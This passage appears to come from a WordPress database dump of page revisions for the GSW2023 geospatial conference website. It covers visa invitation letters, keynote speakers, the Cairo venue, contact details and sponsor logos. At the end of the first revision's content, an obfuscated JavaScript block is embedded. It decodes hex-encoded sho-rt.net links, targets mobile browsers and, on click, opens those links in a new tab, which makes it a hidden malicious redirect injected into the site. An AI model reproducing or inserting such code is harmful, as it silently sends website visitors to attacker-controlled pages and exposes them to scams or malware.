spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<h2 style=\"text-align: center;\"></h2>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-15 23:14:34','2023-08-15 23:14:34','',3066,'https://gsw2023.com/?p=5214',0,'revision','',0),
(5215,1,'2023-08-15 23:15:16','2023-08-15 23:15:16','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 145px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 160px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081968955{margin-top: 115px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>                    Platinum Sponsors</strong></span></h4>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner 